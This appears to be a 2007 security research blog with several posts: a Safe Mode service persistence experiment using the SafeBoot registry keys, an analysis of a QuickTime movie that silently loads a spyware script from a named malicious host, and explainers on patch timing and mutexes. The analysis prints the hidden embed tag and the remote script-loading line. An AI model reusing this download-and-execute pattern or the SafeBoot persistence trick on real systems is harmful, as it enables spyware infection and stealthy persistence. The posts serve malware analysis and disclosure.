Didier Stevens

Monday 26 March 2007

Playing with Safe Mode

Filed under: Hacking — Didier Stevens @ 21:23

Safe Mode has been on my mind lately, now that I discovered that the SafeBoot registry keys simply reference devices, services and drivers that have to be enabled when booting into Safe Mode. Could it be that one can easily configure his own service to run in Safe Mode? Yes, one can!

Here is a very simple service I programmed to test my idea. This service just writes a string to debug output every second. You can view the debug output with Sysinternal’s DebugView utility.

You install the service with this command (admin rights are needed to install services):

  MySafeModeService -i

This will configure the Service Control Manager to automatically start MySafeModeService when the machine is booted (for now, the service is just installed, it is not started).
During the installation of the service, the following registry keys are created:

  HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\MySafeModeService, Default = Service
  HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\MySafeModeService, Default = Service

The HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot registry key is where all Safe Mode settings are persisted, deleting this key prevents you from booting into Safe Mode.
The subkeys Minimal and Network are for the 2 Safe Boot modes: without and with networking. Adding a subkey to Minimal with the name of your service and a default value set to Service, makes that your service will be started when you boot into Safe Mode without networking. The same applies for the Network subkey.

Boot into Safe Mode after installing MySafeModeService. Start DebugView, you’ll get an error, but just ignore it:

sms_debugviewerror.PNG

sms_mysafemodeservice.PNG

When I asked Mikko Hyponen if he knew of a virus that would add itself to the SafeBoot key, he came up with a surprising answer: the Sony Rootkit!

Sunday 18 March 2007

Update: P0wned by a QT movie

Filed under: Malware,Update — Didier Stevens @ 19:14

Apple has released a new QuickTime version (7.1.5) without support for JavaScript. This happened about a week before I posted “P0wned by a QT movie”. I had analyzed the infection and written (but not published) my post before Apple published the update, and since I don’t use QT (it’s not installed on my systems), I was not aware of this fix when I published my post.

This unfortunate timeline created some confusion, several readers wanted to know if this infection vector could still be used with the latest QuickTime version. I’ve tested this and I can confirm that the latest version of QuickTime (7.1.5) doesn’t support JavaScript anymore. Apple has done the right thing, even if it was “a feature and not a bug”, the best thing to do was to remove support for JavaScript in QuickTime.

The modified QT movie I used in my tests displays a message box when it is embedded in an HTML page and viewed with IE. If you’re interested, I’ve made a movie of my tests (rest assured, it’s not QT), the movie is hosted here on YouTube, and you can find a hires version (XviD) here.

Monday 12 March 2007

P0wned by a QT movie

Filed under: Malware — Didier Stevens @ 10:14

Here’s an interesting infection vector, used by a new malware: it’s a QuickTime movie!

McAfee VirusScan detects the malware as JS/SpaceTalk Trojan. The description for this malware is empty, your guess of the characteristics of this malware is as good mine.

Interested in the details? Read on!

This Myspace page (of a French rockband) has an embedded QuickTime movie. Here’s the EMBED HTML tag in the source (I changed the formatting to make it more readable):

  <embed
    enableJavascript="false"
    allowScriptAccess="never"
    allownetworking="internal"
    src=http://profileawareness.com/tys4.mov
    hidden=true />

The EMBED tag instructs your browser to play a movie when it renders the HTML page. But in this case, the movie is hidden (attribute hidden is true). It’s a QuickTime movie, downloaded from the profileawareness.com server.

This tys4.mov QuickTime movie is sneaky: it contains JavaScript code to download and execute another JavaScript program. QuickTime has a feature that allows you to embed URLs or JavaScript in a movie. Apple calls this feature HREF tracks. From the Apple site:

An HREF track is a special type of text track that adds interactivity to a QuickTime movie. HREF tracks contain URLs that can specify movies that replace the current movie, load another frame, or that load QuickTime Player. They can also specify JavaScript functions or Web pages that load a specific browser frame or window.

An HREF track is not meant to be displayed; it simply contains link information. The URLs in an HREF track can be interactive or automatic. An interactive URL loads when you click anywhere in the movie’s display area. An automatic URL loads as a movie is playing at the exact frame specified by a text descriptor timestamp in the HREF track. With automatic URLs, you can create a narrated tour of a website, use web pages as slides in a presentation, activate a JavaScript command, or do anything else that requires loading movies or web pages in a predetermined sequence.

The syntax for an HREF track is simple, here’s an example that automatically loads the page http://www.google.com 1 minute into the movie:

  [00:01:00.00]

  A<http://www.google.com> T<frame>

Let’s take a look inside the tys4.mov QuickTime movie. First we use the strings command to dump all strings contained in this QuickTime file.

  strings tys4.mov

Here is what we see at the end of the dump:

qt_strings.PNG

Do you recognize the syntax at the end: A<javascript> T<>
It will automatically execute a JavaScript script when the movie is played (since there is no timestamp, the script executes immediately).
The script is simple: it creates a script tag and adds it to the HTML page, thereby downloading and executing a new script from the profileawareness server:

<script src=’http://profileawareness.com/logs4/sqltrack.js‘/>

It’s this script that is detected by McAfee (at the moment of writing, McAfee was the only antivirus on VirusTotal to detect this script).

The QuickTime fileformat is a binary, hierarchical stream of atoms.
Qtatomizer is a tool to display this hierarchy of atoms.

qt_qtatomizer.PNG

The QuickTime movie is what is known as a Downloader, but AV programs do not detect it.

The downloaded script is just Spyware, it will collect data about the Myspace user viewing the page and upload it to the profileawareness server.

qt_script.PNG

To summarize the actions:
• You visit a website
• It plays a hidden QuickTime movie
• The QuickTime movie automatically downloads a JavaScript program
• The JavaScript program is executed

Friday 9 March 2007

No Microsoft Security Bulletins for March 2007

Filed under: Vulnerabilities — Didier Stevens @ 9:20

Microsoft announced that there are no patches planned for next week’s patch Tuesday.

It will be interesting to see if new zero-days will appear in the coming days. We often see new zero-days just after patch Tuesday. There’s a theory that states that exploit writers do this to maximize the life-time of the exploit. If this theory is correct, we should already see new zero-days appearing between now and Tuesday, because exploit writers won’t have to wait for Tuesday to maximize the life-time of the exploits.

Tuesday 6 March 2007

USBVirusScan v1.4.0

Filed under: My Software,Update — Didier Stevens @ 9:35

USBVirusScan v1.4.0 has a new “feature”: from this version on, only one instance can be running. This was requested by Alfredo.

I use a mutex to detect if an instance of USBVirusScan is already running, and if it is, I do not launch another instance.

Mutexes are used by programmers to orchestrate exclusive access to a resource. Suppose your program is multi-threaded and that separate threads are reading, checking and updating the same global variable. Thread A could read global variable G, followed by thread B writing global variable G. Thread A will then make decisions on an outdated value of global variable G (it has just been changed by thread B). To avoid this, we must be sure that reading, checking and updating is an atomic operation, i.e., that when thread B is using global variable G, threat A cannot start using it before thread B is done.

This can be done with a mutex. When thread B wants to use global variable G, it first has to create a mutex. Creating a mutex is requested to the OS. The OS guarantees that creating the mutex is also an atomic operation: 2 programs cannot create the same mutex simultaneously. If the mutex doesn’t exist, it is created and the program is informed of the creation. On the other hand, if the mutex already exists, the program is informed that the mutex already exists. So if thread B successfully creates the mutex, it knows that no other thread is using the global variable and that it can use it. If thread A tries to create a mutex, it will fail because it already exists, and therefor it knows it cannot use global variable G. When thread B has done reading, checking and writing global variable G, it releases the mutex, thereby giving other threads the opportunity to create the mutex and access global variable G.

A mutex can also be used to restrict the number of running instances of a program. When the program is started, it first creates a mutex. If it succeeds, it continues and never releases the mutex (the mutex will be released by the operating system when the program terminates). However, if the creation fails, the program knows that another instance is already running and it just stops. This makes that only one instance of the program can be running.

Mutexes can be named, for example “USBVirusScan”, this allows for the creation of many different mutexes.

Mutexes are also used by virus writers to limit the number of running instances of their virus. If a virus is allowed to reproduce uncontrolled on a machine, the huge number of running instances would soon kill the machine, thereby DoSing it.

Do you remember “inoculation” programs? They would prevent the execution of a particular virus strain on your machine. They work with mutexes: the inoculation program creates the same mutex as the virus would, and then stays resident, never releasing the mutex. If the virus wants to run on your inoculated machine, if fails to create the mutex and stops the infection, assuming your machine is already infected.

This tactic is also used in some viruses to disable competing viruses: not only do they create their own mutex, but also the mutex of the competing virus …

Blog at WordPress.com.